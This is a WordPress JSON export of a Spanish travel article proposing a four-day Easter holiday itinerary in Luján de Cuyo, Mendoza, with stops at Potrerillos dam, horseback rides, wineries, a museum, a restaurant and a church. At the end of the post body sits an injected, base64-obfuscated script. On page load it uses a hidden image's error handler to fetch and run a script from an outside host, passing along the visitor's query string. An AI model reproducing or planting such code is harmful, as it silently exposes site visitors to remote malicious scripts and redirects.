{"id":9486,"date":"2025-04-16T09:19:06","date_gmt":"2025-04-16T12:19:06","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=9486"},"modified":"2025-08-13T15:29:40","modified_gmt":"2025-08-13T18:29:40","slug":"una-semana-santa-llena-de-experiencias-en-lujan-de-cuyo-2","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=9486","title":{"rendered":"Una Semana Santa llena de experiencias en Luj\u00e1n de Cuyo"},"content":{"rendered":"\n<p><strong><em>Luego de las vacaciones de verano y los feriados de Carnaval, nos volvemos a preparar para un nuevo descanso prolongado: el feriado de Semana Santa, del 17 al 20 de abril, cuatro d\u00edas que se convierten en la excusa perfecta para viajar, relajarse y cambiar de aire.<\/em><\/strong><\/p>\n\n\n\n<p>Si lo que est\u00e1s buscando para esa fecha es una escapada que combine relax con naturaleza, el departamento de Luj\u00e1n de Cuyo (Mendoza) es una excelente opci\u00f3n. Ubicado en el coraz\u00f3n del valle del r\u00edo Mendoza, Luj\u00e1n de Cuyo despliega postales de todo tipo, en las que se entrelazan imponentes cordones monta\u00f1osos con frondosos vi\u00f1edos y r\u00edos de aguas cristalinas.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Hotel-cacheuta-c.webp\"><img decoding=\"async\" width=\"600\" height=\"600\" data-id=\"9491\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Hotel-cacheuta-c.webp\" alt=\"\" class=\"wp-image-9491\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Hotel-cacheuta-c.webp 600w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Hotel-cacheuta-c-300x300.webp 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Hotel-cacheuta-c-150x150.webp 150w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Hotel-cacheuta-c-420x420.webp 420w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Hotel-cacheuta-c-320x320.webp 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Hotel-cacheuta-c-480x480.webp 480w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Entre-Cielo-0017.webp\"><img decoding=\"async\" width=\"1024\" height=\"614\" data-id=\"9493\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Entre-Cielo-0017-1024x614.webp\" alt=\"\" class=\"wp-image-9493\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Entre-Cielo-0017-1024x614.webp 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Entre-Cielo-0017-300x180.webp 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Entre-Cielo-0017-768x461.webp 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Entre-Cielo-0017-1536x922.webp 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Entre-Cielo-0017-696x418.webp 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Entre-Cielo-0017-1068x641.webp 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Entre-Cielo-0017-700x420.webp 700w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Entre-Cielo-0017-320x192.webp 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Entre-Cielo-0017-480x288.webp 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Entre-Cielo-0017-800x480.webp 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Entre-Cielo-0017.webp 2000w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Entre-Cielo-0008-1.webp\"><img decoding=\"async\" width=\"1024\" height=\"614\" data-id=\"9492\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Entre-Cielo-0008-1-1024x614.webp\" alt=\"\" class=\"wp-image-9492\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Entre-Cielo-0008-1-1024x614.webp 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Entre-Cielo-0008-1-300x180.webp 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Entre-Cielo-0008-1-768x461.webp 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Entre-Cielo-0008-1-1536x922.webp 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Entre-Cielo-0008-1-696x418.webp 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Entre-Cielo-0008-1-1068x641.webp 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Entre-Cielo-0008-1-700x420.webp 700w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Entre-Cielo-0008-1-320x192.webp 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Entre-Cielo-0008-1-480x288.webp 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Entre-Cielo-0008-1-800x480.webp 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Entre-Cielo-0008-1.webp 2000w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n<\/figure>\n\n\n\n<p>Por todo esto y mucho m\u00e1s, y de cara al fin de semana largo, aqu\u00ed te dejamos una propuesta de cuatro d\u00edas que te permitir\u00e1 sumergirte en la belleza natural y cultural de este encantador departamento mendocino.<\/p>\n\n\n\n<p><strong>D\u00eda 1: llegada y relax con paseo por el dique Potrerillos<\/strong><\/p>\n\n\n\n<p>Con el tiempo, el dique Potrerillos se fue transformando en uno de los sitios m\u00e1s visitados de Mendoza, tanto por su belleza natural como por las actividades que se pueden practicar en el lugar.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-2 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Sup-Yoga-0002-1.webp\"><img decoding=\"async\" width=\"768\" height=\"1024\" data-id=\"9489\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Sup-Yoga-0002-1-768x1024.webp\" alt=\"\" class=\"wp-image-9489\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Sup-Yoga-0002-1-768x1024.webp 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Sup-Yoga-0002-1-225x300.webp 225w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Sup-Yoga-0002-1-696x928.webp 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Sup-Yoga-0002-1-315x420.webp 315w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Sup-Yoga-0002-1-320x427.webp 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Sup-Yoga-0002-1-480x640.webp 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Sup-Yoga-0002-1-800x1067.webp 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Sup-Yoga-0002-1.webp 900w\" sizes=\"(max-width: 768px) 100vw, 768px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Sup-Yoga-0001-1.webp\"><img decoding=\"async\" width=\"1024\" height=\"614\" data-id=\"9490\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Sup-Yoga-0001-1-1024x614.webp\" alt=\"\" class=\"wp-image-9490\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Sup-Yoga-0001-1-1024x614.webp 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Sup-Yoga-0001-1-300x180.webp 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Sup-Yoga-0001-1-768x461.webp 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Sup-Yoga-0001-1-1536x922.webp 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Sup-Yoga-0001-1-696x418.webp 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Sup-Yoga-0001-1-1068x641.webp 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Sup-Yoga-0001-1-700x420.webp 700w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Sup-Yoga-0001-1-320x192.webp 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Sup-Yoga-0001-1-480x288.webp 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Sup-Yoga-0001-1-800x480.webp 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/04\/Sup-Yoga-0001-1.webp 2000w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n<\/figure>\n\n\n\n<p>Localizado a 60 km. de la ciudad de Mendoza, el dique Potrerillos -de 1.500 hect\u00e1reas de superficie- regula el caudal del r\u00edo Mendoza, conformando un gran espejo de color esmeralda que cautiva la mirada de los m\u00e1s avezados turistas.<\/p>\n\n\n\n<p>Para llegar hasta all\u00ed en veh\u00edculo particular, es posible tomar la Ruta Internacional 7, que une nuestro pa\u00eds con Chile, y que permite ir disfrutando de un paisaje caracterizado por la presencia de vi\u00f1edos y cordones monta\u00f1osos.<\/p>\n\n\n\n<p>Una vez all\u00ed lo que sigue es contemplar la imponente postal panor\u00e1mica que aparece frente a nuestros ojos con s\u00f3lo cruzar el t\u00fanel que une Cacheuta con el perilago.<\/p>\n\n\n\n<p>Pero el dique Potrerillos tambi\u00e9n se erige como escenario de deportes acu\u00e1ticos. De este modo, si queremos sumar adrenalina a esta parada, podemos optar por la pr\u00e1ctica de rafting o kayak en el imponente espejo de agua.<\/p>\n\n\n\n<p>Informaci\u00f3n de contacto<\/p>\n\n\n\n<p><em>Rafting y Kayak<\/em>: Potrerillos Park &#8211; WhatsApp: +54 9 2615 92.3235<\/p>\n\n\n\n<p><strong>D\u00eda 2: cabalgata en plena naturaleza mendocina<\/strong><strong><\/strong><\/p>\n\n\n\n<p>Para vivir una experiencia \u00fanica de conexi\u00f3n con la naturaleza, disfrutar del aire libre y contemplar hermosos paisajes de monta\u00f1a, nada mejor que descubrir toda la belleza natural de Potrerillos a trav\u00e9s de una tranquila cabalgata.<\/p>\n\n\n\n<p>\u00c9sta es la experiencia que ofrece la gente de Cabalgatas Los Camperitos: un recorrido de dos horas, con impresionantes vistas del valle y la cordillera, montando caballos entrenados para una experiencia \u00fanica y segura. Las cabalgatas son acompa\u00f1adas por gu\u00edas expertos apasionados por la naturaleza y el turismo, que comparten sus conocimientos sobre la flora y la fauna locales durante todo el recorrido.<\/p>\n\n\n\n<p>Cabalgatas Los Camperitos tambi\u00e9n ofrece la posibilidad de realizar una \u201cCabalgata con comida\u201d, consistente en un men\u00fa de tres pasos que incluye una suculenta picada y empanadas como entrada; asado con guarnici\u00f3n de papas al horno y ensalada como plato principal; y postre.<\/p>\n\n\n\n<p>Informaci\u00f3n de contacto<\/p>\n\n\n\n<p><em>Cabalgatas Los Camperitos<\/em>: WhatsApp: +54 9261 2580835<\/p>\n\n\n\n<p><strong>D\u00eda 3: los secretos de las bodegas mendocinas con el WINE BUS<\/strong><strong><\/strong><\/p>\n\n\n\n<p>Luj\u00e1n de Cuyo se caracteriza por ser el escenario de portentosas bodegas, que ofrecen al visitante la posibilidad de realizar un completo recorrido por la producci\u00f3n y elaboraci\u00f3n del vino, desde la cosecha de las uvas hasta su fermentaci\u00f3n y a\u00f1ejamiento en barricas.<\/p>\n\n\n\n<p>La experiencia de enoturismo incluye hacer una caminata entre los vi\u00f1edos, disfrutar de la tranquilidad y los aromas del entorno y, por supuesto, degustar una diversidad de cepas que van desde el emblem\u00e1tico Malbec hasta otros varietales destacados como el Cabernet Sauvignon, el Merlot y el Bonarda.<\/p>\n\n\n\n<p>La idea del <strong>Wine Bus<\/strong> fue pensada como una manera de facilitar el acceso aproductos y servicios de importantes bodegas lujaninas, en el marco de un formato&nbsp;<em>low<\/em>&nbsp;<em>cost y optimizando el tiempo de cada visita<\/em>. Gracias a una alianza entre el Municipio de Luj\u00e1n de Cuyo, con Wine Pass y Oro Negro, el viajero que no tiene movilidad propia puede realizar los tours en forma c\u00f3moda y muy accesible. Funciona exclusivamente los d\u00edas s\u00e1bados Y se realiza el siguiente itinerario:<\/p>\n\n\n\n<p>\u00b7&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;10:00 hs: Salida desde los Caballitos de Marly<\/p>\n\n\n\n<p>\u00b7&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;10:40 hs: Plaza de Luj\u00e1n de Cuyo<\/p>\n\n\n\n<p>\u00b7&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;11:30 hs: Bodega Ruca Mal\u00e9n<\/p>\n\n\n\n<p>\u00b7&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;12:10 hs: Bodega S\u00e9ptima<\/p>\n\n\n\n<p>\u00b7&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;13:00 hs: Bodega Terrazas de los Andes<\/p>\n\n\n\n<p>\u00b7&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;13:40 hs: Plaza Luj\u00e1n de Cuyo<\/p>\n\n\n\n<p>\u00b7&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;14:30 hs: Caballitos de Marly<\/p>\n\n\n\n<p>&nbsp;El ticket del recorrido se adquiere a trav\u00e9s de&nbsp;<a href=\"http:\/\/www.winepass.com.ar\/\" target=\"_blank\" rel=\"noreferrer noopener\">www.winepass.com.ar<\/a>&nbsp; y circuitos incluyen el traslado (saliendo desde el informador tur\u00edstico del Parque General San Mart\u00edn), 30 minutos para fotos y una degustaci\u00f3n de una copa de vino en cada bodega, para finalmente regresar al punto de partida (Parque General San Mart\u00edn).<\/p>\n\n\n\n<p>Una de las excursiones recomendables es la denominada \u201cAsado Bodega Familia C\u00e1nepa\u201d, que combina un t\u00edpico asado familiar con una degustaci\u00f3n de exquisitos vinos.<\/p>\n\n\n\n<p><strong><em>Informaci\u00f3n de Contacto<\/em><\/strong><\/p>\n\n\n\n<p><em>Bodega Familia C\u00e1nepa<\/em>: Viamonte 3869, Chacras de Coria. Tel\u00e9fono: +54 9261 3354383<\/p>\n\n\n\n<p><strong>D\u00eda 4: Museos, Almuerzo y misa de domingo de Pascua<\/strong><\/p>\n\n\n\n<p>Para el \u00faltimo d\u00eda -el del regreso a casa- aconsejamos una propuesta m\u00e1s tranquila, acorde a los tiempos que cualquier turista debe manejar para rearmar su equipaje y abordar el transporte que lo regrese a su hogar.<\/p>\n\n\n\n<p>La primera parada de nuestro recorrido es el Museo Provincial de Bellas Artes Emiliano Gui\u00f1az\u00fa \u2013 Casa de Fader, ubicado en San Mart\u00edn 3651, Luj\u00e1n de Cuyo. Creado en 1951, en lo que fue la antigua casona de veraneo de don Emiliano Gui\u00f1az\u00fa y su familia, cuenta con una importante colecci\u00f3n de obras de artistas pl\u00e1sticos provinciales, nacionales e internacionales.<\/p>\n\n\n\n<p>La casona donde funciona fue donada en 1945 al estado mendocino por Do\u00f1a Narcisa Araujo de Gui\u00f1az\u00fa -viuda de don Emiliano Gui\u00f1az\u00fa- y transformada mediante una original concepci\u00f3n de museo-parque.<\/p>\n\n\n\n<p>El museo -que tiene como objetivo conservar, proteger y difundir el patrimonio cultural provincial- cuenta con una colecci\u00f3n de m\u00e1s 1.700 obras locales, nacionales e internacionales, que incluye una de las colecciones m\u00e1s importantes a nivel nacional de las obras de Fernando Fader, adem\u00e1s de murales de su autor\u00eda.<\/p>\n\n\n\n<p><strong>Qu\u00e9 ver en el museo<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><em>Muestra permanente<\/em>: obras de Fernando Fader y grandes maestros como Fidel De Luc\u00eda, Antonio Bravo, Rosario Moreno y Eliana Molinelli.<\/li>\n\n\n\n<li><em>Muestras temporarias<\/em>: obras de importantes colecciones, como la del pintor Alejandro Chiapasco (acuarelas) y el grabador Adolfo Bellocq (xilograf\u00edas).<\/li>\n\n\n\n<li><em>Museo Parque<\/em>: esculturas de diferentes \u00e9pocas y estilos en un entorno natural.<\/li>\n<\/ul>\n\n\n\n<p>Para recargar energ\u00edas, la segunda parada de nuestro recorrido es el restaurante Torcuato Grill &amp; Bar, una parrilla gourmet especializada en los mejores cortes de la regi\u00f3n, donde es posible disfrutar de un suculento almuerzo. Todo regado con excelentes vinos mendocinos de primera l\u00ednea.<\/p>\n\n\n\n<p>En este espacio gastron\u00f3mico, la recomendaci\u00f3n es una entrada compuesta por un d\u00fao de pastelitos fritos de carne cortada a cuchillo; ojo de bife acompa\u00f1ado de ensalada de r\u00facula y queso parmesano como plato principal; y flan con dulce de leche, crema de naranja y pralin\u00e9 como postre. Lo que obligatoriamente debe ir acompa\u00f1ado por un buen vino Malbec.<\/p>\n\n\n\n<p>Con una atm\u00f3sfera casual y acogedora, Torcuato Grill &amp; Bar cuenta con opciones de asientos en su sal\u00f3n interior, as\u00ed como al aire libre y en una hermosa terraza, lo que permite a los clientes disfrutar de sus comidas en un entorno agradable.<\/p>\n\n\n\n<p>La tercera parada de nuestro recorrido es la Parroquia Nuestra Se\u00f1ora de La Carrodilla, un lugar emblem\u00e1tico de la cultura y la identidad mendocinas. La tradici\u00f3n de esta parroquia se remonta al siglo XVII, cuando Antonio Solanilla, un inmigrante aragon\u00e9s, trajo una imagen de la Virgen desde su pueblo natal.<\/p>\n\n\n\n<p>La tercera parada de nuestro recorrido es la parroquia Nuestra Se\u00f1ora de La Carrodilla, un lugar emblem\u00e1tico de la cultura y la identidad mendocinas.<\/p>\n\n\n\n<p>El origen de este hermoso templo se remonta al siglo XVII, cuando el inmigrante aragon\u00e9s Antonio Solanilla, oriundo de un pueblito llamado Estadilla -ubicado a los pies de la sierra de la Carrodilla- lleg\u00f3 a esta provincia, trasladando consigo una imagen de la virgen. Una vez instalado en Luj\u00e1n de Cuyo, Solanilla hizo construir una capilla junto a la casona donde viv\u00eda.<\/p>\n\n\n\n<p>El 13 de febrero de 1938 se produjo la coronaci\u00f3n de la virgen durante una solemne ceremonia, por lo que a partir de ese d\u00eda se conmemora el d\u00eda de la Patrona de los Vi\u00f1edos, que a\u00f1o a a\u00f1o recibe las plegarias de todos los vendimiadores.<\/p>\n\n\n\n<p>En ella no s\u00f3lo es posible impregnarse de su riqueza cultural -signada por una fuerte identidad y devoci\u00f3n popular- sino tambi\u00e9n visitar un curioso museo de tallas ind\u00edgenas y la casona colonial que perteneciera a la familia Solanilla; as\u00ed como el calvario de la Carrodilla y el V\u00eda Crucis.<\/p>\n\n\n\n<p>Informaci\u00f3n de contacto<\/p>\n\n\n\n<p><strong><em>Museo<\/em><\/strong>:<\/p>\n\n\n\n<p>Horarios: martes a domingos y feriados de 10 a 19 hs.<\/p>\n\n\n\n<p>Tel\u00e9fono: (0261) 4960224<\/p>\n\n\n\n<p>Entrada gratuita.<\/p>\n\n\n\n<p>Servicio de visitas guiadas y reserva de turnos para visitas educativas.<\/p>\n\n\n\n<p><strong><em>Torcuato Grill &amp; Bar<\/em><\/strong><strong><em><\/em><\/strong><\/p>\n\n\n\n<p>Tel\u00e9fono: (0261) 7089448<\/p>\n\n\n\n<p>Horarios: martes de 18 a 1; mi\u00e9rcoles a s\u00e1bados de 10.30 a 16 y de 17 a 1; y domingos de 10 a 17.<\/p>\n\n\n\n<p><strong><em>Parroquia de la Carrodilla<\/em><\/strong><strong><em><\/em><\/strong><\/p>\n\n\n\n<p>Tel\u00e9fono: (0261) 4361667<\/p>\n\n\n\n<p>Horario de atenci\u00f3n al turista: lunes a viernes de 15.30 a 20<\/p>\n\n\n\n<p>M\u00e1s info en:<\/p>\n\n\n\n<p>Web: <a href=\"https:\/\/lujandecuyo.tur.ar\/\">https:\/\/lujandecuyo.tur.ar\/<\/a><\/p>\n\n\n\n<p>Instagram: @destinolujanmza<\/p>\n\n\n\n<p>PRENSA LUJAN DE CUYO TURISMO<\/p>\n\n\n\n<p>Para m\u00e1s fotos o entrevistas comunicarse con<\/p>\n\n\n\n<p>@SOYSANDRAKAN<\/p>\n\n\n\n<p>@CRISTELACICARE<\/p>\n<p>\u00a0<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Luego de las vacaciones de verano y los feriados de Carnaval, nos volvemos a preparar para un nuevo descanso prolongado: el feriado de Semana Santa, del 17 al 20 de abril, cuatro d\u00edas que se convierten en la excusa perfecta para viajar, relajarse y cambiar de aire. Si lo que est\u00e1s buscando para esa fecha [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":9491,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[29],"tags":[],"class_list":["post-9486","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-datos-utiles"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9486","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9486"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9486\/revisions"}],"predecessor-version":[{"id":9944,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9486\/revisions\/9944"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/9491"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9486"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9486"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9486"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}